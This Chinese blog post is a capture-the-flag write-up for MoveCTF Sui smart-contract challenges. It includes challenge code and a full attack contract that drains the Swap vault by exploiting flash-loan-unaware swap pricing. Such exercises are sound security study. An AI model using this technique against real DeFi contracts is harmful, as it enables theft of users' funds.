<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="google-site-verification" content="kDP0Dxs1_nBan7wIjoDmFGV34uwZ0l0hwkRGuuJUe2g" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zoiltin.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="movectf 2024的部分题目wp">
<meta property="og:type" content="article">
<meta property="og:title" content="movectf_2023_wp">
<meta property="og:url" content="https://zoiltin.github.io/2024/01/13/movectf-2023-wp/index.html">
<meta property="og:site_name" content="Zoiltin&#39;s Blog">
<meta property="og:description" content="movectf 2024的部分题目wp">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-01-13T00:48:17.000Z">
<meta property="article:modified_time" content="2024-01-13T01:41:14.095Z">
<meta property="article:author" content="Zoiltin">
<meta property="article:tag" content="write up">
<meta property="article:tag" content="movectf 2024">
<meta property="article:tag" content="blockchains">
<meta property="article:tag" content="smart contract">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://zoiltin.github.io/2024/01/13/movectf-2023-wp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>movectf_2023_wp | Zoiltin's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Zoiltin's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-友链">

    <a href="/friends/" rel="section"><i class="fa fa-fw fa-friends"></i>友链</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zoiltin.github.io/2024/01/13/movectf-2023-wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Zoiltin">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Zoiltin's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          movectf_2023_wp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-01-13 08:48:17 / 修改时间：09:41:14" itemprop="dateCreated datePublished" datetime="2024-01-13T08:48:17+08:00">2024-01-13</time>
            </span>

          
            <div class="post-description">movectf 2024的部分题目wp</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>[TOC]</p>
<h3 id="Checkin"><a href="#Checkin" class="headerlink" title="Checkin"></a>Checkin</h3><blockquote>
<p>sorce:100</p>
</blockquote>
<p>题目源码:</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">module movectf::checkin &#123;</span><br><span class="line">    <span class="keyword">use</span> sui::event;</span><br><span class="line">    <span class="keyword">use</span> sui::tx_context::&#123;<span class="keyword">Self</span>, TxContext&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> ESTRING:<span class="type">u64</span> = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Flag</span> has copy, drop &#123;</span><br><span class="line">        sender: address,</span><br><span class="line">        flag: <span class="type">bool</span>,</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public entry fun <span class="title function_ invoke__">get_flag</span>(string: vector&lt;<span class="type">u8</span>&gt;, ctx: &amp;<span class="keyword">mut</span> TxContext) &#123;</span><br><span class="line">        <span class="built_in">assert!</span>(string == <span class="string">b&quot;MoveBitCTF&quot;</span>,ESTRING);</span><br><span class="line">        event::<span class="title function_ invoke__">emit</span>(Flag &#123;</span><br><span class="line">            sender: tx_context::<span class="title function_ invoke__">sender</span>(ctx),</span><br><span class="line">            flag: <span class="literal">true</span>,</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>带着MoveBitCTF字符串作为参数调用get_flag函数。传参要用字节。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 转换为十六进制</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;0x&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&quot;MoveBitCTF&quot;</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">hex</span>(<span class="built_in">ord</span>(i)).replace(<span class="string">&quot;0x&quot;</span>,<span class="string">&quot;&quot;</span>),end=<span class="string">&quot;&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>调用即可：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sui client call --package package_id --module module_name --<span class="keyword">function</span> get_flag --args 0x4d6f7665426974435446 --gas-budget 10000000</span><br></pre></td></tr></table></figure>

<h3 id="DynamicMatrixTraversal"><a href="#DynamicMatrixTraversal" class="headerlink" title="DynamicMatrixTraversal"></a>DynamicMatrixTraversal</h3><blockquote>
<p>sorce: 200</p>
</blockquote>
<p>关键代码</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">public entry fun <span class="title function_ invoke__">execute</span>(record: &amp;<span class="keyword">mut</span> Record, m: <span class="type">u64</span>, n: <span class="type">u64</span>) &#123;</span><br><span class="line">    <span class="title function_ invoke__">if</span> (record.count_1 == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">let</span> <span class="variable">result</span>: <span class="type">u64</span> = <span class="title function_ invoke__">up</span>(m, n);</span><br><span class="line">        <span class="built_in">assert!</span>(result == TARGET_VALUE_1, ERROR_RESULT_1);</span><br><span class="line">        record.count_1 = m;</span><br><span class="line">        record.count_2 = n;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="title function_ invoke__">if</span> (record.count_3 == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">let</span> <span class="variable">result</span>: <span class="type">u64</span> = <span class="title function_ invoke__">up</span>(m, n);</span><br><span class="line">        <span class="built_in">assert!</span>(result == TARGET_VALUE_2, ERROR_RESULT_2);</span><br><span class="line">        record.count_3 = m;</span><br><span class="line">        record.count_4 = n;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">public entry fun <span class="title function_ invoke__">get_flag</span>(record: &amp;Record, ctx: &amp;<span class="keyword">mut</span> TxContext) &#123;</span><br><span class="line">    <span class="built_in">assert!</span>(record.count_1 &lt; record.count_3, ERROR_PARAM_1);</span><br><span class="line">    <span class="built_in">assert!</span>(record.count_2 &gt; record.count_4, ERROR_PARAM_2);</span><br><span class="line">    event::<span class="title function_ invoke__">emit</span>(Flag &#123; user: tx_context::<span class="title function_ invoke__">sender</span>(ctx), flag: <span class="literal">true</span> &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag的条件是count_1 &lt; count_3且count_2 &gt; count_4。     </p>
<blockquote>
<p>up函数使用动态规划根据输入参数m和n计算一个值。它使用一个向量的向量构建一个值的矩阵，并从矩阵的最后一行的最后一个元素中检索所需的值。</p>
</blockquote>
<p>让ai将up函数用python重写然后本地跑一下的到两组数据，3-169和5-89。<br>通过execute函数去赋值（数字m和n传递时要转换成十六进制）。然后调用get_flag即可。</p>
<h3 id="Swap"><a href="#Swap" class="headerlink" title="Swap"></a>Swap</h3><blockquote>
<p>sorce: 200</p>
</blockquote>
<p>题目源码：</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">module swap::vault&#123;</span><br><span class="line">    <span class="keyword">use</span> sui::coin::&#123;<span class="keyword">Self</span>, Coin&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::tx_context::&#123;<span class="keyword">Self</span>, TxContext&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::balance::&#123;<span class="keyword">Self</span>, Balance&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::object::&#123;<span class="keyword">Self</span>, ID, UID&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::transfer;</span><br><span class="line">    <span class="keyword">use</span> sui::event;</span><br><span class="line">    <span class="keyword">use</span> swap::ctfa::&#123;<span class="keyword">Self</span>, MintA&#125;;</span><br><span class="line">    <span class="keyword">use</span> swap::ctfb::&#123;<span class="keyword">Self</span>, MintB&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Vault</span>&lt;phantom A, phantom B&gt; has key &#123;</span><br><span class="line">        id: UID,</span><br><span class="line">        coin_a: Balance&lt;A&gt;,</span><br><span class="line">        coin_b: Balance&lt;B&gt;,</span><br><span class="line">        flashed: <span class="type">bool</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Flag</span> has copy, drop &#123;</span><br><span class="line">        win: <span class="type">bool</span>,</span><br><span class="line">        sender: address</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Receipt</span> &#123;</span><br><span class="line">        id: ID,</span><br><span class="line">        a_to_b: <span class="type">bool</span>,</span><br><span class="line">        repay_amount: <span class="type">u64</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public entry fun initialize&lt;A,B&gt;(capa: MintA&lt;A&gt;, capb: MintB&lt;B&gt;,ctx: &amp;<span class="keyword">mut</span> TxContext) &#123;</span><br><span class="line">        <span class="keyword">let</span> <span class="variable">vault</span> = Vault&lt;A, B&gt; &#123;</span><br><span class="line">            id: object::<span class="title function_ invoke__">new</span>(ctx),</span><br><span class="line">            coin_a: coin::<span class="title function_ invoke__">into_balance</span>(ctfa::<span class="title function_ invoke__">mint_for_vault</span>(capa, ctx)),</span><br><span class="line">            coin_b: coin::<span class="title function_ invoke__">into_balance</span>(ctfb::<span class="title function_ invoke__">mint_for_vault</span>(capb, ctx)),</span><br><span class="line">            flashed: <span class="literal">false</span></span><br><span class="line">        &#125;;</span><br><span class="line">        transfer::<span class="title function_ invoke__">share_object</span>(vault);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public fun flash&lt;A,B&gt;(vault: &amp;<span class="keyword">mut</span> Vault&lt;A,B&gt;, amount: <span class="type">u64</span>, a_to_b: <span class="type">bool</span>, ctx: &amp;<span class="keyword">mut</span> TxContext): (Coin&lt;A&gt;, Coin&lt;B&gt;, Receipt) &#123;</span><br><span class="line">        <span class="built_in">assert!</span>(!vault.flashed, <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">let</span> (coin_a, coin_b) = <span class="title function_ invoke__">if</span> (a_to_b) &#123;</span><br><span class="line">        (coin::zero&lt;A&gt;(ctx), coin::<span class="title function_ invoke__">from_balance</span>(balance::<span class="title function_ invoke__">split</span>(&amp;<span class="keyword">mut</span> vault.coin_b, amount ), ctx))</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">        (coin::<span class="title function_ invoke__">from_balance</span>(balance::<span class="title function_ invoke__">split</span>(&amp;<span class="keyword">mut</span> vault.coin_a, amount ), ctx), coin::zero&lt;B&gt;(ctx))</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">let</span> <span class="variable">receipt</span> = Receipt &#123;</span><br><span class="line">            id: object::<span class="title function_ invoke__">id</span>(vault),</span><br><span class="line">            a_to_b,</span><br><span class="line">            repay_amount: amount</span><br><span class="line">        &#125;;</span><br><span class="line">        vault.flashed = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">        (coin_a, coin_b, receipt)</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public fun repay_flash&lt;A,B&gt;(vault: &amp;<span class="keyword">mut</span> Vault&lt;A,B&gt;, coina: Coin&lt;A&gt;, coinb: Coin&lt;B&gt;, receipt: Receipt) &#123;</span><br><span class="line">        <span class="keyword">let</span> <span class="variable">Receipt</span> &#123;</span><br><span class="line">            id: _,</span><br><span class="line">            a_to_b: a2b,</span><br><span class="line">            repay_amount: amount</span><br><span class="line">        &#125; = receipt;</span><br><span class="line">        <span class="title function_ invoke__">if</span> (a2b) &#123;</span><br><span class="line">            <span class="built_in">assert!</span>(coin::<span class="title function_ invoke__">value</span>(&amp;coinb) &gt;= amount, <span class="number">0</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">assert!</span>(coin::<span class="title function_ invoke__">value</span>(&amp;coina) &gt;= amount, <span class="number">1</span>);</span><br><span class="line">        &#125;;</span><br><span class="line">        balance::<span class="title function_ invoke__">join</span>(&amp;<span class="keyword">mut</span> vault.coin_a, coin::<span class="title function_ invoke__">into_balance</span>(coina));</span><br><span class="line">        balance::<span class="title function_ invoke__">join</span>(&amp;<span class="keyword">mut</span> vault.coin_b, coin::<span class="title function_ invoke__">into_balance</span>(coinb));</span><br><span class="line">        vault.flashed = <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public fun swap_a_to_b&lt;A,B&gt;(vault: &amp;<span class="keyword">mut</span> Vault&lt;A,B&gt;, coina:Coin&lt;A&gt;, ctx: &amp;<span class="keyword">mut</span> TxContext): Coin&lt;B&gt; &#123;</span><br><span class="line">            <span class="keyword">let</span> <span class="variable">amount_out_B</span> = coin::<span class="title function_ invoke__">value</span>(&amp;coina) * balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_b) / balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_a);</span><br><span class="line">            coin::put&lt;A&gt;(&amp;<span class="keyword">mut</span> vault.coin_a, coina);</span><br><span class="line">            coin::<span class="title function_ invoke__">take</span>(&amp;<span class="keyword">mut</span> vault.coin_b, amount_out_B, ctx)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public fun swap_b_to_a&lt;A,B&gt;(vault: &amp;<span class="keyword">mut</span> Vault&lt;A,B&gt;, coinb:Coin&lt;B&gt;, ctx: &amp;<span class="keyword">mut</span> TxContext): Coin&lt;A&gt; &#123;</span><br><span class="line">            <span class="keyword">let</span> <span class="variable">amount_out_A</span> = coin::<span class="title function_ invoke__">value</span>(&amp;coinb) * balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_a) / balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_b);</span><br><span class="line">            coin::put&lt;B&gt;(&amp;<span class="keyword">mut</span> vault.coin_b, coinb);</span><br><span class="line">            coin::<span class="title function_ invoke__">take</span>(&amp;<span class="keyword">mut</span> vault.coin_a, amount_out_A, ctx)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public fun get_flag&lt;A,B&gt;(vault: &amp;Vault&lt;A,B&gt;, ctx: &amp;TxContext) &#123;</span><br><span class="line">        <span class="built_in">assert!</span>(</span><br><span class="line">            balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_a) == <span class="number">0</span> &amp;&amp; balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_b) == <span class="number">0</span>, <span class="number">123</span></span><br><span class="line">        );</span><br><span class="line">        event::<span class="title function_ invoke__">emit</span>(</span><br><span class="line">            Flag &#123;</span><br><span class="line">                win: <span class="literal">true</span>,</span><br><span class="line">                sender: tx_context::<span class="title function_ invoke__">sender</span>(ctx)</span><br><span class="line">            &#125;</span><br><span class="line">        );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>ctfa和ctfb中定义了两种货币，不是重点，就不放源码了。        </p>
<p>提供了闪电贷和两种货币相互兑换的功能。</p>
<h4 id="介绍一下闪电贷"><a href="#介绍一下闪电贷" class="headerlink" title="介绍一下闪电贷"></a>介绍一下闪电贷</h4><p>源码中Receipt作为欠条，在用户贷款时发送给用户，由于其没有drop能力，所以交易结束之前如果没有被解包就会报错导致交易失败。<br>repay_flash函数可以解包receipt。这就意味着贷款的借出和归还只能在一笔交易中进行，就是让你借出去拿这些钱去套利，然后马上还回来，如果不换或者换的不够交易就失败，这笔交易就不会写入链上。</p>
<h4 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h4><p>由于定义了vault.flashed变量，所以我们只能一次借一种货币且在未还清之前不能再借，所以我们要先将vault中某一种货币清空，再把另一种货币借空，然后调用get_flag，然后再还钱就可以了。        </p>
<p>swap_a_to_b和swap_b_to_a可以将两种货币相互兑换，兑换时按照比例进行兑换，但问题在于，兑换的比率没有考虑贷款。以swap_a_to_b为例：</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">public fun swap_a_to_b&lt;A,B&gt;(vault: &amp;<span class="keyword">mut</span> Vault&lt;A,B&gt;, coina:Coin&lt;A&gt;, ctx: &amp;<span class="keyword">mut</span> TxContext): Coin&lt;B&gt; &#123;</span><br><span class="line">        <span class="comment">// 传参vault为银行，coina为我们的A货币</span></span><br><span class="line">        <span class="keyword">let</span> <span class="variable">amount_out_B</span> = coin::<span class="title function_ invoke__">value</span>(&amp;coina) * balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_b) / balance::<span class="title function_ invoke__">value</span>(&amp;vault.coin_a);</span><br><span class="line">        <span class="comment">// 计算出可以兑换的B的数量，这里只考虑了vault内的余量，没有加上我们已经贷出去的。</span></span><br><span class="line">        coin::put&lt;A&gt;(&amp;<span class="keyword">mut</span> vault.coin_a, coina);</span><br><span class="line">        coin::<span class="title function_ invoke__">take</span>(&amp;<span class="keyword">mut</span> vault.coin_b, amount_out_B, ctx)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>vault中初始有A,B各100个，攻击者初始拥有A,B各10个。          </p>
<ol>
<li>我先借90个A</li>
<li>在用10个A去换B，此时vault中 B&#x2F;A &#x3D; 10  ,所以10个A可以还100个B。</li>
<li>在把90个A还回去。<br>通过这三步操作，我们手上拥有110个B（10个本来拥有+vault中的100个）和0个A（10A换成了B）。而且此时所有的欠款均已还清。<br>最后在把vault中的110个A借出来就可以了。</li>
</ol>
<h4 id="攻击合约"><a href="#攻击合约" class="headerlink" title="攻击合约:"></a>攻击合约:</h4><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">module zoiltin_solve_swap::exp&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">use</span> sui::coin::&#123;<span class="keyword">Self</span>,Coin&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::tx_context::&#123;<span class="keyword">Self</span>,TxContext&#125;;</span><br><span class="line">    <span class="keyword">use</span> sui::transfer;</span><br><span class="line">    <span class="keyword">use</span> sui::balance::&#123;<span class="keyword">Self</span>&#125;;</span><br><span class="line">    <span class="keyword">use</span> swap::vault::&#123;<span class="keyword">Self</span>,Receipt&#125;;</span><br><span class="line"></span><br><span class="line">    public entry fun exp&lt;A,B&gt;(bank: &amp;<span class="keyword">mut</span> vault::Vault&lt;A,B&gt;,my_coin_a: Coin&lt;A&gt;,ctx: &amp;<span class="keyword">mut</span> TxContext)&#123;</span><br><span class="line">        <span class="comment">// 传参带进来vault和我们初始的10个A</span></span><br><span class="line">        <span class="keyword">let</span> (coin_a_1,coin_b_1,receipt_1) = vault::flash&lt;A,B&gt;(bank,<span class="number">90</span>,<span class="literal">false</span>,ctx);</span><br><span class="line">        <span class="comment">// 借90个A</span></span><br><span class="line">        <span class="keyword">let</span> <span class="variable">coin_b_swap</span> = vault::swap_a_to_b&lt;A,B&gt;(bank,my_coin_a,ctx);</span><br><span class="line">        <span class="comment">// 10A个换成B</span></span><br><span class="line">        <span class="built_in">assert!</span>(coin::<span class="title function_ invoke__">value</span>(&amp;coin_b_swap) == <span class="number">100</span>, <span class="number">12</span>);  <span class="comment">// 换出来的B的数量是否等于100</span></span><br><span class="line">        transfer::<span class="title function_ invoke__">public_transfer</span>(coin_b_swap,tx_context::<span class="title function_ invoke__">sender</span>(ctx));</span><br><span class="line">        <span class="comment">// 将100个B传递到我们的地址上</span></span><br><span class="line">        vault::repay_flash&lt;A,B&gt;(bank,coin_a_1,coin_b_1,receipt_1);</span><br><span class="line">        <span class="comment">// 还债90个A</span></span><br><span class="line">        <span class="keyword">let</span> (coin_a_2,coin_b_2,receipt_2) = vault::flash&lt;A,B&gt;(bank,<span class="number">110</span>,<span class="literal">false</span>,ctx);</span><br><span class="line">        <span class="comment">// 再借110个A</span></span><br><span class="line">        <span class="built_in">assert!</span>(coin::<span class="title function_ invoke__">value</span>(&amp;coin_a_2) == <span class="number">110</span>, <span class="number">11</span>);    <span class="comment">// 第二次借出来A的数量是否等于110</span></span><br><span class="line">        vault::get_flag&lt;A,B&gt;(bank,ctx);</span><br><span class="line">        <span class="comment">// 拿flag</span></span><br><span class="line">        vault::repay_flash&lt;A,B&gt;(bank,coin_a_2,coin_b_2,receipt_2);</span><br><span class="line">        <span class="comment">// 还钱110A</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="部署攻击合约"><a href="#部署攻击合约" class="headerlink" title="部署攻击合约"></a>部署攻击合约</h4><p>这部分也该提一下，网上的资料基本都是英文的，甚至英文的资料都很少。</p>
